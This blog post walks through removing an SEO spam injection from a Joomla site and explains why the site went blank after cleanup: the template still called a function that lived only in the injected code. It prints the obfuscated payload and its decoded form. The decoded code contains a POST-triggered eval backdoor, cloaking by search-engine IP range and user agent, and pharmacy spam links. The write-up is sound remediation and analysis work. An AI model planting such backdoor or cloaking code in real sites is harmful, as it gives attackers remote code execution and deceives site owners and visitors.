Pages

Oct 29, 2014

Spam Injection Removal Causing Joomla Website Not Functioning

When remediating compromised website issue, scanning and removing the bad code is not always a straightforward process to call it a day.

In this particular case, a Joomla website was injected with SEO spam code on one of its core files, ./includes/framework.php

<?php

/**

 * @package Joomla.Site

 * @subpackage Application

 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.

 * @license GNU General Public License version 2 or later; see LICENSE.txt

 */

// No direct access.

defined('_JEXEC') or die;

//

// Joomla system checks.

//

@ini_set('magic_quotes_runtime', 0);

@ini_set('zend.ze1_compatibility_mode', '0');

...

...

define('_SEC_KEY_','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');$_00=explode(0,str_rot13(strrev(('rpnycre_trec0rqbprq_46rfno0rgnysavmt0ynir'))));$_00[3]('!1!e',"{$_00[0]}({$_00[1]}({$_00[2]}(_SEC_KEY_)))",1);

...


After decoding the suspicious code inside define() function with spidermonkey, it is clear the that SEO spam was injected into the website and to allow only search engine bots see the content and include in the search engine results to increase ranking


if(-1735437564==crc32($_POST['k890']))eval(base64_decode($_POST['k891']));function _ee_($v,$z=0){eval($z?base_64_decode($v):$v);}function _ajax_bootstrap_($w=''){if($w){$_SERVER['!']=$w;ob_start('_zz_');register_shutdown_function('ob_end_flush');}elseif(function_exists('_aa_')) echo _zz_();}function _zz_($t=''){$s=&$_SERVER;$w=$s['!'];$kj='216.239.32.0/19,64.233.160.0/19,66.249.80.0/20,72.14.192.0/18,209.85.128.0/17,66.102.0.0/20,74.125.0.0/16,64.18.0.0/20,207.126.144.0/20,173.194.0.0/16,65.52.104.0/24,65.52.108.0/22,65.55.24.0/24,65.55.52.0/24,65.55.55.0/24,65.55.213.0/24,65.55.217.0/24,131.253.24.0/22,131.253.46.0/23,157.55.16.0/23,157.55.18.0/24,157.55.32.0/22,157.55.36.0/24,157.55.48.0/24,157.55.109.0/24,157.55.110.40/29,157.55.110.48/28,157.56.92.0/24,157.56.93.0/24,157.56.94.0/23,157.56.229.0/24,199.30.16.0/24,207.46.12.0/23,207.46.192.0/24,207.46.195.0/24,207.46.199.0/24,207.46.204.0/24,67.195.37.0/24,67.195.50.0/24,67.195.110.0/24,67.195.111.0/24,67.195.112.0/23,67.195.114.0/24,67.195.115.0/24,68.180.224.0/24,72.30.132.0/24,72.30.142.0/24,72.30.161.0/24,72.30.196.0/24,72.30.198.0/24,74.6.8.0/24,74.6.13.0/24,74.6.17.0/24,74.6.18.0/24,74.6.22.0/24,74.6.27.0/24,98.137.72.0/24,98.137.206.0/24,98.137.207.0/24,98.139.168.0/24,114.111.95.0/24,124.83.159.0/24,124.83.179.0/24,124.83.223.0/24,183.79.63.0/24,183.79.92.0/24,203.216.255.0/24,211.14.11.0/24,204.236.235.245,75.101.186.145,119.63.196.0/24,115.239.212.0/24,119.63.199.0/24,122.81.208.0/22,123.125.71.0/24,180.76.4.0/24,180.76.5.0/24,180.76.6.0/24,185.10.104.0/24,220.181.108.0/24,220.181.51.0/24,123.125.67.144/29,123.125.67.152/31,123.125.68.68/30,123.125.68.72/29,123.125.68.80/28,123.125.68.96/30,202.46.48.0/20,123.125.68.80/30,123.125.68.84/31,94.154.212.228,91.225.123.253,94.154.212.66';foreach(explode(',',$kj) as $i){if($i&&_cz($s['REMOTE_ADDR'],$i)){$bo=1;break;}}if($bo||preg_match("/(googlebot|mediapartners|adsbot|enterprise|msnbot|scooter|slurp|yahoo|search|bing|ask|indexer|baidu)/i",$s['HTTP_USER_AGENT'])){$u=_aa_();if($w)$t=str_ireplace($w,$u.$w,$t);else $t=$u;}return $t;}function _cz($ip,$r){list($s,$b)=explode('/',$r);$m=-1<<(32-($b?$b:32));return (ip2long($ip)&$m)==(ip2long($s)&$m);}function _z($t){if(preg_match_all('!{([^}]+)}!',$t,$o,PREG_SET_ORDER)){$r=abs(crc32($_SERVER['REQUEST_URI']));foreach($o as $x){$m=explode('|',$x[1]);$t=str_replace($x[0],$m[$r%count($m)],$t);}}return $t;}function _aa_(){$a="In asia there are many treatments for known diseases, doctors recommend to buy <em><a href=\"http://asiapharm[.]net/buy- <******snip******> online</em> {without rx|without prescription|with no rx}.";return "<div class='medical-announcement'>"._z($a)."</div>";}

After comparing with the good Joomla's ./includes/framework.php and removed the injected code, the website's homepage went blank. This indicates that there's fatal error on the website, but since the error reporting is disabled (which is a good practice for production site), the website just display White Screen of Death (WSOD).

It turns out the function on injected code,  _ajax_bootstrap_(), was called within the index.php of the active template, and since the function was removed earlier, fatal error was occurred and causing the website not functioning

<?php

/**

 * @package                Joomla.Site

 * @subpackage Templates.beez_20

 * @copyright        Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.

 * @license                GNU General Public License version 2 or later; see LICENSE.txt

 */


// No direct access.

defined('_JEXEC') or die;

ini_set('display_errors',0);

jimport('joomla.filesystem.file');

..

..

                    <jdoc:include type="modules" name="position-1" />

                </div>

             </div><?php _ajax_bootstrap_(); ?>

             <div class="headerMenuWrap">

                 <jdoc:include type="modules" name="position-2" />

                 <jdoc:include type="modules" name="position-3" />

  <jdoc:include type="modules" name="position-top-search" />

..

..


Once the function call was removed from template's index.php, the homepage were able to load again. Since the injection has been cleaned, the next process would be to rebuild the sitemap and and get the website re-index by Google and on other affected search engines.